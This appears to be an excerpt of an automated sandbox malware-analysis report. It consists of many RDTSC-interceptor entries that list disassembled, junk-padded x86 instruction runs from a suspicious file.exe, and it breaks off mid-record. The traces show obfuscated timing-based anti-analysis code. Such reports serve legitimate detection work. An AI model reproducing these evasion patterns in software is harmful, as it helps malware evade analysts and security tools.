                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B15543 second address: B1558B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b jg 00007FE784D2BEB6h 0x00000011 jmp 00007FE784D2BEBFh 0x00000016 popad 0x00000017 pop esi 0x00000018 nop 0x00000019 mov si, 153Dh 0x0000001d push 00000000h 0x0000001f add esi, dword ptr [ebp+122D1BCEh] 0x00000025 push 5F86362Ah 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FE784D2BEC2h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1558B second address: B15642 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FE784B99A31h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 5F8636AAh 0x00000012 mov edx, 775BF4C1h 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FE784B99A28h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 sub dword ptr [ebp+122D2B57h], edi 0x00000039 push 00000000h 0x0000003b movsx edx, dx 0x0000003e push 00000003h 0x00000040 push 00000000h 0x00000042 push eax 0x00000043 call 00007FE784B99A28h 0x00000048 pop eax 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc eax 0x00000056 push eax 0x00000057 ret 0x00000058 pop eax 0x00000059 ret 0x0000005a xor edx, dword ptr [ebp+122D2745h] 0x00000060 jne 00007FE784B99A33h 0x00000066 call 00007FE784B99A29h 0x0000006b push eax 0x0000006c push edx 0x0000006d jc 00007FE784B99A3Eh 0x00000073 jmp 00007FE784B99A38h 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15642 second address: B15648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15648 second address: B1564C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1564C second address: B1567D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007FE784D2BECFh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1567D second address: B15681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15681 second address: B156AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE784D2BEC2h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jo 00007FE784D2BEC4h 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007FE784D2BEB6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15788 second address: B1578C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1578C second address: B157A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15958 second address: B15965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007FE784B99A2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15965 second address: B15970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15970 second address: B15984 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE784B99A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15984 second address: B1598F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE784D2BEB6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1598F second address: B159CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE784B99A33h 0x00000008 ja 00007FE784B99A26h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 jnc 00007FE784B99A26h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE784B99A2Fh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B159CC second address: B159E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c pushad 0x0000000d jmp 00007FE784D2BEBEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15AC7 second address: B15ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15ACB second address: B15ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FE784D2BEBCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15ADC second address: B15AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B357A2 second address: B357AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B357AB second address: B357B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B357B1 second address: B357C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784D2BEC4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B357C9 second address: B357DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE784B99A2Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B357DD second address: B35800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE784D2BEB6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007FE784D2BEC2h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B336EC second address: B336F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B336F2 second address: B336F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B336F6 second address: B33718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A35h 0x00000007 jg 00007FE784B99A26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33718 second address: B3371E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33837 second address: B33870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A34h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FE784B99A38h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B339DA second address: B339FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE784D2BEBDh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33B6B second address: B33B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33B71 second address: B33B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE784D2BEB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33B7B second address: B33B88 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE784B99A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33FAF second address: B33FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33FB3 second address: B33FCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FE784B99A26h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34151 second address: B3415C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE784D2BEB6h 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3415C second address: B3417C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FE784B99A26h 0x00000009 jmp 00007FE784B99A2Fh 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3417C second address: B34197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784D2BEC5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B345F0 second address: B34605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE784B99A2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3471F second address: B34734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34734 second address: B34738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A7D0 second address: B2A7D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3486A second address: B34889 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE784B99A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE784B99A35h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34889 second address: B34894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FE784D2BEB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34894 second address: B348D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE784B99A26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE784B99A39h 0x00000012 jmp 00007FE784B99A37h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35191 second address: B35197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35197 second address: B351A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B351A0 second address: B351A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35351 second address: B35385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jno 00007FE784B99A38h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35385 second address: B3538B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CD45 second address: B3CD49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B042FE second address: B0430D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jp 00007FE784D2BEB6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40627 second address: B40641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B407A7 second address: B407AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B407AD second address: B407B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B407B7 second address: B407D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE784D2BEB6h 0x0000000a popad 0x0000000b jg 00007FE784D2BEC0h 0x00000011 jmp 00007FE784D2BEBAh 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B407D7 second address: B4080D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007FE784B99A35h 0x0000000d popad 0x0000000e jnl 00007FE784B99A2Ah 0x00000014 ja 00007FE784B99A28h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4080D second address: B40811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4092F second address: B4093E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jg 00007FE784B99A2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4093E second address: B40942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40942 second address: B4094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FE784B99A26h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40C69 second address: B40C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40C6E second address: B40C8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FE784B99A32h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40C8A second address: B40C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40F5F second address: B40F83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A39h 0x00000007 push ecx 0x00000008 jc 00007FE784B99A26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44A62 second address: B44A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44B94 second address: B44B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45CD1 second address: B45D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784D2BEC6h 0x00000009 popad 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FE784D2BEB8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a movzx esi, bx 0x0000002d push 00000000h 0x0000002f mov edi, dword ptr [ebp+122D1B14h] 0x00000035 push eax 0x00000036 pushad 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45D1E second address: B45D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784B99A39h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE784B99A39h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46D7A second address: B46DDB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE784D2BEB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FE784D2BEC6h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FE784D2BEB8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D2AFAh] 0x00000031 push 00000000h 0x00000033 mov dword ptr [ebp+122D1BBFh], edx 0x00000039 push 00000000h 0x0000003b mov esi, dword ptr [ebp+122D285Dh] 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B465B1 second address: B465B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B485E1 second address: B485E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B485E8 second address: B48604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007FE784B99A26h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push ecx 0x00000010 jmp 00007FE784B99A2Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48604 second address: B48612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jno 00007FE784D2BEB6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AA44 second address: B4AA48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B492B9 second address: B492BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49D36 second address: B49D3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AA48 second address: B4AA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A75D second address: B4A761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AA4E second address: B4AA64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE784D2BEC1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C9FC second address: B4CA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51624 second address: B5162E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FE784D2BEB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D133 second address: B4D137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5162E second address: B516AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FE784D2BEBCh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FE784D2BEB8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+122D2DABh] 0x00000032 mov edi, esi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FE784D2BEB8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov di, dx 0x00000053 push 00000000h 0x00000055 jc 00007FE784D2BEB6h 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f pushad 0x00000060 popad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50727 second address: B50746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B516AA second address: B516AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D137 second address: B4D1D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FE784B99A28h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 and bx, 7C94h 0x00000037 xor ebx, 16CD7C3Eh 0x0000003d mov eax, dword ptr [ebp+122D0039h] 0x00000043 mov bx, si 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b call 00007FE784B99A28h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp+04h], ebx 0x00000055 add dword ptr [esp+04h], 00000014h 0x0000005d inc ebx 0x0000005e push ebx 0x0000005f ret 0x00000060 pop ebx 0x00000061 ret 0x00000062 call 00007FE784B99A37h 0x00000067 push ebx 0x00000068 pop ebx 0x00000069 pop ebx 0x0000006a push eax 0x0000006b push eax 